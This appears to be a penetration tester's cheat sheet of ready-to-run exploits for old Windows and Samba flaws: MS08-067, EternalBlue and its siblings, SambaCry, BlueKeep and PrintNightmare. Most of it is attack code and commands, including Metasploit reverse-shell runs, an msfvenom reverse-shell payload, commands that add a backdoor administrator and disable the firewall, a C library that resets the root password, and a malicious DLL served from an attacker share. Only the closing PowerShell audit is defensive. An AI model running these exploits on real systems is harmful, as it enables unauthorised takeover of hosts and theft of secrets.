# Low-Hanging Fruits

## net\_api

**CVE-2008-4250, MS08-067**

Check:

```
$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check
```

Exploit:

```
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

## EternalBlue

**CVE-2017-0144, MS17-010**

### Unauthenticated (FuzzBunch + Wine)

* <https://github.com/fuzzbunch/fuzzbunch>
* <https://github.com/nopernik/fuzzbunch_wrapper>
* <https://0x00sec.org/t/porting-the-leaked-equation-group-eqgrp-fuzzbunch-tool-to-linux/1956>
* <https://habr.com/ru/post/327490/>
* <https://codeby.net/threads/eternalblue-doublepulsar-exploit-in-metasploit-win-7-hack.59593/>

```
$ python2 fbcli.py eternalblue --TargetIp 192.168.1.11
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Ping
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function RunDLL --DllPayload /tmp/createuser.dll --ProcessName spoolsv.exe
$ python2 fbcli.py doublepulsar --TargetIp 192.168.1.11 --Function Uninstall
```

### Authenticated (Windows 2003 or R/W Pipe)

#### MSF

Check:

```
$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run
```

Exploit with:

```
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

**EternalRomance / EternalSynergy / EternalChampion**

Exploit with `ms17_010_psexec`:

```
msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

Exploit with `ms17_010_command`:

```
msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user hax0r Passw0rd! /add && net localgroup administrators hax0r /add"
msf > run
```

#### Manually

* <https://github.com/helviojunior/MS17-010>
* <https://github.com/jdiazmx/MS17-010_WORAWIT>
* <https://0xdf.gitlab.io/2019/02/21/htb-legacy.html#ms-17-010>

Send MSF payload and execute it with `send_and_execute.py`:

```
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe
```

Or just execute commands on host via `zzz_exploit.py` (at least one named pipe must be accessible on target):

```
$ python zzz_exploit.py 192.168.1.11
```

{% code title="zzz_exploit.py" %}

```python
def smb_pwn(conn, arch):
    service_exec(conn, r'cmd /c net user hax0r Passw0rd! /add && cmd /c net localgroup administrators hax0r /add && cmd /c netsh firewall set opmode disable')
```

{% endcode %}

{% hint style="info" %}
For x86 EternalBlue shellcodes use [AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) (very unstable).
{% endhint %}

A feature for grabbing registry secrets in one shot:

```
$ git clone https://github.com/worawit/MS17-010.git && cd MS17-010
$ git checkout -b smb_get_file 83b3745
$ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch
$ git apply zzz_smb_get_file.patch
```

## SambaCry

**CVE-2017-7494** (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)

### MSF

```
msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run
```

### Manually

* <https://github.com/opsxcq/exploit-CVE-2017-7494>
* <https://github.com/joxeankoret/CVE-2017-7494>

Compile the `.so` shared library (its constructor runs with Samba's privileges as soon as the library is loaded):

{% code title="pwn.c" %}

```c
// gcc -shared -fPIC -o pwn.so pwn.c

#define _GNU_SOURCE  // setresuid() is a GNU extension declared in <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Constructor attribute: runs automatically when the library is loaded by the Samba process
static void pwn() __attribute__((constructor));

void pwn() {
    setresuid(0, 0, 0);
    system("echo 'root:Passw0rd!'|chpasswd");
}
```

{% endcode %}

Get real share path on the target's filesystem:

```
$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path:    /home/snovvcrash/sharename
```

Upload `pwn.so` to target and then run the exploit:

```
$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7 venv
$ . venv/bin/activate
$ pip install -r requirements.txt
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''
```

## BlueKeep

**CVE-2019-0708**

Check:

```
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run
```

Exploit:

```
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
```

## PrintNightmare

**CVE-2021-1675, CVE-2021-34527**

* <https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html>
* <https://pentestlab.blog/2021/08/17/domain-escalation-printnightmare/>
* <https://itm4n.github.io/printnightmare-exploitation/>

### Check

#### CrackMapExec

* <https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/modules/spooler.py>

```
$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler
```

#### ItWasAllADream

* <https://github.com/byt3bl33d3r/ItWasAllADream>

```
$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes'
```

### Exploit

#### C/C++

RCE (fork of the original repo):

* <https://github.com/afwu/PrintNightmare>

LPE:

* <https://github.com/hlldz/CVE-2021-1675-LPE>

#### Python

RCE:

* <https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py>
* <https://github.com/cube0x0/CVE-2021-1675/blob/main/SharpPrintNightmare/CVE-2021-1675.py>
* <https://www.hackthebox.eu/blog/windows-protocols-python>

**Usage**

1. Prepare [an SMB share with anonymous authentication](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/smb-rpc.md#smb-share-with-null-authentication) allowed (`smbserver.py` also works).
2. Generate an evil DLL: a C2 stager / add user to a privileged group ([1](https://github.com/newsoft/adduser), [2](https://github.com/calebstewart/CVE-2021-1675/blob/main/nightmare-dll/nightmare/dllmain.cpp), [3](https://github.com/calebstewart/CVE-2021-1675/tree/main/nightmare-dll), etc.) / invoke a [custom](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking#your-own) command (see example below).
3. Run the exploit:

```
$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
```

{% code title="pwn.c" %}

```c
// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

// Thread routine started from DllMain when the DLL is loaded. Using the real
// LPTHREAD_START_ROUTINE signature avoids the cast and a calling-convention mismatch on x86.
DWORD WINAPI Entry(LPVOID lpParam) {
    (void)lpParam;
    system("powershell -enc <BASE64_PWSH_CODE>");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            // Run the payload in its own thread so DllMain returns immediately
            CreateThread(NULL, 0, Entry, NULL, 0, NULL);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
```

{% endcode %}

{% embed url="https://snovvcrash.github.io/2021/06/30/leveraging-printnightmare-to-abuse-rbcd.html" %}

#### C\#

RCE + LPE:

* <https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare>

#### PowerShell

LPE:

* <https://github.com/calebstewart/CVE-2021-1675>

### Reproducibility

Flowchart by [@wdormann](https://twitter.com/wdormann):

{% embed url="https://twitter.com/wdormann/status/1412906574998392840" %}

### Mitigation

* <https://github.com/LaresLLC/CVE-2021-1675>
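A read-only audit of a host's PrintNightmare exposure, added here as an example (it is not from this page or the LaresLLC repo above). It assumes it runs elevated on a supported Windows build and relies only on the documented Point and Print policy values under `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint` from Microsoft's CVE-2021-34527 guidance (KB5005010); nothing else is assumed.

```powershell
# Added example: audit Print Spooler exposure to CVE-2021-34527 on the local host.
# Nothing is changed; findings are printed for review.

$PolicyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

function Get-PointAndPrintValue {
    param([string]$Name)
    # Returns $null when the policy key or value does not exist
    $item = Get-ItemProperty -Path $PolicyPath -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Get-PrintNightmareFindings {
    $findings = @()

    # 1. A host that is not a print server (above all a DC) should not run the spooler at all:
    #    a stopped and disabled Spooler removes the RCE/LPE surface entirely.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($spooler -and $spooler.Status -eq 'Running') {
        $findings += "Spooler service is running (StartType: $($spooler.StartType))"
    }

    # 2. After the July 2021 update driver installation requires admin rights by default.
    #    An explicit value of 0 re-enables the vulnerable behaviour even on a patched host.
    $restrict = Get-PointAndPrintValue 'RestrictDriverInstallationToAdministrators'
    if ($restrict -eq 0) {
        $findings += 'RestrictDriverInstallationToAdministrators = 0 (non-admins may install drivers)'
    }

    # 3. Both Point and Print prompts must stay enabled (value 0 or absent); any other value
    #    bypasses the elevation/warning prompt that the fix depends on.
    foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
        $v = Get-PointAndPrintValue $name
        if ($null -ne $v -and $v -ne 0) {
            $findings += "$name = $v (expected 0 or absent)"
        }
    }

    return $findings
}

$result = Get-PrintNightmareFindings
if ($result.Count -eq 0) {
    Write-Output 'OK: spooler stopped or Point and Print restrictions in place'
} else {
    Write-Output 'Review required:'
    $result | ForEach-Object { Write-Output "  - $_" }
}
```

The registry checks only cover the policy override; a host that reports "OK" must still have the July 2021 or later cumulative update installed for the default restriction to apply.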


